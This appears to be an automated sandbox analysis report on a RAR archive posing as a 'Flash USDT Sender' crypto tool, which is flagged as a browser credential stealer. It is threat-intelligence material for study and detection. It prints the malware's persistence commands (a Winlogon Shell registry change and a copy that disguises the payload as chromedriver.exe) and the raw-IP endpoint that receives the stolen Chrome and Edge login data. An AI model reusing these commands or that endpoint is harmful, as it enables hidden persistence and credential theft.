File name:

FLASH+USDT+SENDER+CR.rar

Full analysis: https://app.any.run/tasks/ac896cbe-6384-47a7-a573-1228d414d5b5
Verdict: Malicious activity
Threats:

Stealers are a category of malicious software intended to gain unauthorized access to users' information and transfer it to the attacker. The stealer category includes programs that each target a particular kind of data, such as files, passwords, and cryptocurrency wallets. Stealers can also spy on their targets by recording keystrokes and taking screenshots. This type of malware is distributed primarily through phishing campaigns.

Analysis date: February 16, 2025, 16:27:05
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
arch-exec
stealer
Indicators:
MIME: application/x-rar
File info: RAR archive data, v5
MD5: B4805F91624F3BD6FE51D78BE1F651DA
SHA1: 267AA0D5098778CED4176BB37A6AA6DAF1558A46
SHA256: 9DBA52730CCCB2ED9B0745A518E1B9F379E6FCA84AAE5412539387788CFF2EE0
SSDEEP: 49152:xpicypSa55gEnDA/feW1SOFAHItVi2wOzMyk9cM240e+5i8hkaTQVjolvPS2gaVZ:xryV5jDA/NrscxwOzsj24Jd8h8Sl3S2T

ANY.RUN is an interactive service that provides full access to the guest system. Information in this report may be distorted by user actions and is provided as is, for the user's information. ANY.RUN does not guarantee the maliciousness or safety of the content.
  • MALICIOUS

    • Generic archive extractor

      • WinRAR.exe (PID: 1544)
    • Changes the login/logoff helper path in the registry

      • reg.exe (PID: 4264)
    • Steals credentials from Web Browsers

      • MSBuild.exe (PID: 6328)
    • Actions looks like stealing of personal data

      • MSBuild.exe (PID: 6328)
  • SUSPICIOUS

    • Reads security settings of Internet Explorer

      • WinRAR.exe (PID: 1544)
    • Hides command output

      • cmd.exe (PID: 2420)
      • cmd.exe (PID: 4520)
    • Starts CMD.EXE for commands execution

      • FLASH USDT SENDER [CRAX.PRO].exe (PID: 6240)
    • Runs PING.EXE to delay simulation

      • cmd.exe (PID: 2420)
      • cmd.exe (PID: 4520)
    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 2420)
    • Executable content was dropped or overwritten

      • cmd.exe (PID: 4520)
    • The executable file from the user directory is run by the CMD process

      • chromedriver.exe (PID: 5008)
    • Connects to the server without a host name

      • MSBuild.exe (PID: 6328)
  • INFO

    • Checks supported languages

      • FLASH USDT SENDER [CRAX.PRO].exe (PID: 6240)
      • chromedriver.exe (PID: 5008)
      • MSBuild.exe (PID: 6328)
    • Executable content was dropped or overwritten

      • WinRAR.exe (PID: 1544)
    • Reads the computer name

      • FLASH USDT SENDER [CRAX.PRO].exe (PID: 6240)
      • chromedriver.exe (PID: 5008)
      • MSBuild.exe (PID: 6328)
    • Reads the machine GUID from the registry

      • FLASH USDT SENDER [CRAX.PRO].exe (PID: 6240)
      • MSBuild.exe (PID: 6328)
      • chromedriver.exe (PID: 5008)
    • Disables trace logs

      • MSBuild.exe (PID: 6328)
    • Creates files in the program directory

      • MSBuild.exe (PID: 6328)
    • Checks proxy server information

      • MSBuild.exe (PID: 6328)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rar | RAR compressed archive (v5.0) (61.5)
.rar | RAR compressed archive (gen) (38.4)

EXIF

ZIP

FileVersion: RAR v5
CompressedSize: 1151648
UncompressedSize: 1562624
OperatingSystem: Win32
ArchivedFileName: FLASH+USDT+SENDER+CR/FLASH USDT SENDER [CRAX.PRO].exe
No data.
All screenshots are available in the full report
Total processes: 140
Monitored processes: 12
Malicious processes: 5
Suspicious processes: 2

Behavior graph

Graph nodes as labelled in the report ("no specs" is the report's own tag):
  • start
  • winrar.exe
  • flash usdt sender [crax.pro].exe (no specs)
  • cmd.exe (no specs)
  • conhost.exe (no specs)
  • ping.exe (no specs)
  • cmd.exe
  • conhost.exe (no specs)
  • ping.exe (no specs)
  • reg.exe
  • ping.exe (no specs)
  • chromedriver.exe (no specs)
  • msbuild.exe

Process information

Columns: PID | CMD | Path | Indicators | Parent process

PID: 1544
CMD: "C:\Program Files\WinRAR\WinRAR.exe" C:\Users\admin\Desktop\FLASH+USDT+SENDER+CR.rar
Path: C:\Program Files\WinRAR\WinRAR.exe
Parent process: explorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
PID: 1580
CMD: ping 127.0.0.1 -n 13
Path: C:\Windows\SysWOW64\PING.EXE
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Ping Command
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\ping.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\ws2_32.dll
PID: 2092
CMD: ping 127.0.0.1 -n 7
Path: C:\Windows\SysWOW64\PING.EXE
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Ping Command
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\ping.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\ws2_32.dll
PID: 2324
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 2420
CMD: "cmd" /c ping 127.0.0.1 -n 7 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\admin\Documents\Chrome\Driver\chromedriver.exe,"
Path: C:\Windows\SysWOW64\cmd.exe
Parent process: FLASH USDT SENDER [CRAX.PRO].exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
PID: 3420
CMD: ping 127.0.0.1 -n 13
Path: C:\Windows\SysWOW64\PING.EXE
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Ping Command
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\ping.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\ws2_32.dll
PID: 4264
CMD: REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\admin\Documents\Chrome\Driver\chromedriver.exe,"
Path: C:\Windows\SysWOW64\reg.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\advapi32.dll
PID: 4520
CMD: "cmd" /c ping 127.0.0.1 -n 13 > nul && copy "C:\Users\admin\AppData\Local\Temp\Rar$EXa1544.4635\FLASH+USDT+SENDER+CR\FLASH USDT SENDER [CRAX.PRO].exe" "C:\Users\admin\Documents\Chrome\Driver\chromedriver.exe" && ping 127.0.0.1 -n 13 > nul && "C:\Users\admin\Documents\Chrome\Driver\chromedriver.exe"
Path: C:\Windows\SysWOW64\cmd.exe
Parent process: FLASH USDT SENDER [CRAX.PRO].exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
PID: 4628
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 5008
CMD: "C:\Users\admin\Documents\Chrome\Driver\chromedriver.exe"
Path: C:\Users\admin\Documents\Chrome\Driver\chromedriver.exe
Parent process: cmd.exe
User:
admin
Company:
6I?5E7CAGG@9IA7872G9F55
Integrity Level:
MEDIUM
Description:
>@GC?7J5EEJ;I55CCB=C
Exit code:
0
Version:
8.12.16.21
Modules
Images
c:\users\admin\documents\chrome\driver\chromedriver.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\mscoree.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
Total events: 2 984
Read events: 2 961
Write events: 23
Delete events: 0

Modification events

PID | Process | Key | Operation | Name | Value
1544 | WinRAR.exe | HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory | write | 3 | C:\Users\admin\Desktop\preferences.zip
1544 | WinRAR.exe | HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory | write | 2 | C:\Users\admin\Desktop\chromium_ext.zip
1544 | WinRAR.exe | HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory | write | 1 | C:\Users\admin\Desktop\omni_23_10_2024_.zip
1544 | WinRAR.exe | HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory | write | 0 | C:\Users\admin\Desktop\FLASH+USDT+SENDER+CR.rar
1544 | WinRAR.exe | HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths | write | name | 120
1544 | WinRAR.exe | HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths | write | size | 80
1544 | WinRAR.exe | HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths | write | type | 120
1544 | WinRAR.exe | HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths | write | mtime | 100
4264 | reg.exe | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon | write | Shell | explorer.exe,C:\Users\admin\Documents\Chrome\Driver\chromedriver.exe,
6328 | MSBuild.exe | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASAPI32 | write | EnableFileTracing | 0
Executable files: 2
Suspicious files: 7
Text files: 0
Unknown types: 0

Dropped files

PID | Process | Filename | Type
4520 | cmd.exe | C:\Users\admin\Documents\Chrome\Driver\chromedriver.exe | executable
  MD5: 09B1C84716B5B142ED3C214011648C7D
  SHA256: 7C96FBC4242E3E3249988E58D3C8917849998B6C221A5F32847F44F48347C283
6328 | MSBuild.exe | C:\Users\admin\Music\Kryptos\tempWD_Chrome | binary
  MD5: F6C33AC5E1032A0873BE7BFC65169287
  SHA256: D97895CEDED32E33D57BDCACCDBE144E58AA87AF4D2F8855D630286CE30A8D83
6328 | MSBuild.exe | C:\Users\admin\Music\Kryptos\tempLD_Edge | binary
  MD5: 29A644B1F0D96166A05602FE27B3F4AD
  SHA256: BF96902FEB97E990A471492F78EE8386BCF430D66BDAEFDEAFBF912C8CF7CE46
6328 | MSBuild.exe | C:\Users\admin\Music\Kryptos\tempWD_Edge | binary
  MD5: 95FFD778940E6DF4846B0B12C8DD5821
  SHA256: 21A2DEBD389DB456465DFEFFDB15F0AF3FBC46F007CBA67513A13EB10D14E94F
6328 | MSBuild.exe | C:\Users\admin\Music\Kryptos.zip | compressed
  MD5: 76CDB2BAD9582D23C1F6F4D868218D6C
  SHA256: 8739C76E681F900923B900C9DF0EF75CF421D39CABB54650C4B9AD19B6A76D85
1544 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$EXa1544.4635\FLASH+USDT+SENDER+CR\FLASH USDT SENDER [CRAX.PRO].exe | executable
  MD5: 09B1C84716B5B142ED3C214011648C7D
  SHA256: 7C96FBC4242E3E3249988E58D3C8917849998B6C221A5F32847F44F48347C283
6328 | MSBuild.exe | C:\Users\admin\Music\Kryptos\tempLS_Edge | binary
  MD5: DFFC82B8D23613E62A20204028CEF32F
  SHA256: 114690F0417A9A6B079EA8D0534F095B04467809DCA929EB0983059E1C60FB6C
6328 | MSBuild.exe | C:\Users\admin\Music\Kryptos\tempLD_Chrome | binary
  MD5: A45465CDCDC6CB30C8906F3DA4EC114C
  SHA256: 4412319EF944EBCCA9581CBACB1D4E1DC614C348D1DFC5D2FAAAAD863D300209
6328 | MSBuild.exe | C:\Users\admin\Music\Kryptos\tempLS_Chrome | binary
  MD5: 414B7F9E82EE13FB08D39D366B2FBEC8
  SHA256: 6F9AD831D38FF839C0EE3593CC5452D7BE31D9725EE81D3E7AD20E4D91736971
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 8
TCP/UDP connections: 25
DNS requests: 13
Threats: 1

HTTP requests

Columns: PID | Process | Method | HTTP Code | IP | URL | CN | Reputation (the Type and Size columns are empty in the report)
7012 | SIHClient.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | whitelisted
7012 | SIHClient.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | whitelisted
1176 | svchost.exe | GET | 200 | 184.30.131.245:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | whitelisted
6424 | backgroundTaskHost.exe | GET | 200 | 2.23.77.188:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D | unknown | whitelisted
6328 | MSBuild.exe | POST | 200 | 185.225.226.125:80 | http://185.225.226.125/backend/api.php | unknown | unknown
6328 | MSBuild.exe | POST | 200 | 185.225.226.125:80 | http://185.225.226.125/backend/recovery.php?wfound=0&cfound=0&bfound=0 | unknown | unknown
6328 | MSBuild.exe | POST | 200 | 185.225.226.125:80 | http://185.225.226.125/backend/api.php | unknown | unknown
6328 | MSBuild.exe | POST | 200 | 185.225.226.125:80 | http://185.225.226.125/backend/api.php | unknown | unknown

Connections

Columns: PID | Process | IP | Domain | ASN | CN | Reputation ("-" marks a field left empty in the report)
4 | System | 192.168.100.255:138 | - | - | - | whitelisted
- | - | 40.127.240.158:443 | - | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown
4 | System | 192.168.100.255:137 | - | - | - | whitelisted
1176 | svchost.exe | 40.126.32.134:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
1176 | svchost.exe | 184.30.131.245:80 | - | AKAMAI-AS | US | unknown
1076 | svchost.exe | 2.19.106.8:443 | go.microsoft.com | AKAMAI-AS | DE | whitelisted
5988 | svchost.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
7012 | SIHClient.exe | 4.175.87.197:443 | slscr.update.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted
7012 | SIHClient.exe | 184.30.21.171:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted
7012 | SIHClient.exe | 20.242.39.171:443 | fe3cr.delivery.mp.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted

DNS requests

Domain
IP
Reputation
login.live.com
  • 40.126.32.134
  • 40.126.32.140
  • 20.190.160.17
  • 20.190.160.128
  • 20.190.160.14
  • 20.190.160.67
  • 40.126.32.136
  • 40.126.32.68
whitelisted
go.microsoft.com
  • 2.19.106.8
whitelisted
settings-win.data.microsoft.com
  • 51.124.78.146
whitelisted
slscr.update.microsoft.com
  • 4.175.87.197
whitelisted
www.microsoft.com
  • 184.30.21.171
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 20.242.39.171
whitelisted
arc.msn.com
  • 20.223.36.55
whitelisted
ocsp.digicert.com
  • 2.23.77.188
whitelisted
fd.api.iris.microsoft.com
  • 20.31.169.57
whitelisted
nexusrules.officeapps.live.com
  • 52.111.229.19
whitelisted

Threats

PID | Process | Class | Message
6328 | MSBuild.exe | Misc activity | SUSPICIOUS [ANY.RUN] Sent Host Name in HTTP POST Body

Process | Message
MSBuild.exe | {"message":"Success - First Connection"}
MSBuild.exe | [RECOVERY] found Chrome Login Data and Local State files.
MSBuild.exe | [RECOVERY] found Edge Login Data and Local State files.
MSBuild.exe | Server Response: {"message":"Recovery Successful."}
MSBuild.exe | {"message":"Success - Updated Last Seen"}
MSBuild.exe | {"message":"Success - Updated Last Seen"}